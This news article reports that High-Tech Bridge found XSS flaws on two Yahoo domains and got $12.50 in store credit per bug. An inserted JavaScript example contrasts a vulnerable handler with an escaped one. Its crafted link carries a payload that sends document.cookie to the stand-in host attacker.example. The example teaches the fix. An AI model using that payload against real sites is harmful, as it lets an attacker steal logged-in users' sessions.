A Swiss penetration testing firm that reported cross-site scripting (XSS) flaws affecting two Yahoo domains was disappointed by the reward the company offered for its research.
According to High-Tech Bridge, which previously found XSS bugs in NASDAQ's website, Yahoo paid $12.50 for each of two bugs the firm reported to it. Furthermore, the money was redeemable only at Yahoo's company store, High-Tech Bridge revealed in a Monday blog post.
The XSS flaws, which affected the ecom.yahoo.com and adserver.yahoo.com domains, could allow any "@Yahoo.com" email account to be compromised if a logged-in user clicked a malicious link crafted by an attacker, the company revealed.
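To make the attack class concrete, the following is an added example (not code from High-Tech Bridge, Yahoo, or SCMagazine.com, and not a reconstruction of the actual Yahoo flaws, which the article does not detail). It shows a reflected XSS of the "logged-in user clicks a malicious link" kind beside the output-encoding fix: the hostnames `search.example.com` and `attacker.example`, the `q` parameter, and the cookie-stealing payload are all assumptions chosen for illustration.

```javascript
// Added example: reflected XSS via a crafted link, and the fix.
// Hostnames, parameter name and payload are illustrative assumptions,
// not details of the Yahoo bugs described in the article.

// Escape text for placement inside an HTML element body or a
// double-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Vulnerable handler: echoes the "q" query parameter straight into HTML,
// so any markup in the link the victim clicked runs in the site's origin.
function renderSearchVulnerable(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return `<h1>Results for ${q}</h1>`;
}

// Hardened handler: same page, but the untrusted value is HTML-escaped
// before it reaches the response body.
function renderSearchFixed(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// The link an attacker would send to a logged-in victim (constructed).
// Once rendered unescaped, the payload ships document.cookie off-site;
// with the session cookie in hand the attacker can act as the victim.
const payload =
  '<img src=x onerror="location=\'https://attacker.example/?c=\'+document.cookie">';
const maliciousLink =
  'https://search.example.com/?q=' + encodeURIComponent(payload);

// Check used to compare the two renderings: list the element tags present
// in the output. The template legitimately contains only <h1>; any other
// tag came from the parameter.
function tagNames(html) {
  return [...html.matchAll(/<([a-z][a-z0-9]*)\b/gi)].map((m) => m[1].toLowerCase());
}

console.log('vulnerable:', renderSearchVulnerable(maliciousLink));
console.log('tags:', tagNames(renderSearchVulnerable(maliciousLink)));
console.log('fixed:', renderSearchFixed(maliciousLink));
console.log('tags:', tagNames(renderSearchFixed(maliciousLink)));
```

The vulnerable rendering contains an injected `img` element whose `onerror` handler fires in the site's origin; the fixed rendering contains only the template's `h1`, with the payload reduced to inert text. Output encoding must match the context (element body, attribute, JavaScript string, URL), and marking session cookies `HttpOnly` limits, but does not eliminate, what an XSS can do with a logged-in session.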
SCMagazine.com reached out to Yahoo, but did not immediately hear back.
Three XSS bugs were reported to Yahoo as of Sept. 23, and the company responded within 48 hours, offering $12.50 each for just two of the bugs. All of the vulnerabilities have since been patched by Yahoo, High-Tech Bridge said.
The company discovered the XSS flaws after beginning an experiment to see "how quickly security vulnerabilities on well-known websites such as Yahoo can be found" and how long it would take to receive a response, the company blog post said.
In a Tuesday email, Ilia Kolochenko, CEO at High-Tech Bridge, told SCMagazine.com that even when they cannot offer sufficient financial motivation, companies could do a better job of providing other incentives for security researchers who report their discoveries.
"Few companies today pay enough money to security researchers to motivate them only by money," Kolochenko wrote. "Even the amounts paid by Google are not high enough to be a sole motivation for researchers. However, when a company also offers a public 'thank you,' such as listing in [a] hall of fame, it can be a good added-value for many security professionals."
Kolochenko told SCMagazine.com that he inquired about a program that recognized researchers' findings. Yahoo's security team emailed him back saying it did not have a hall of fame program, but that this could change in the future.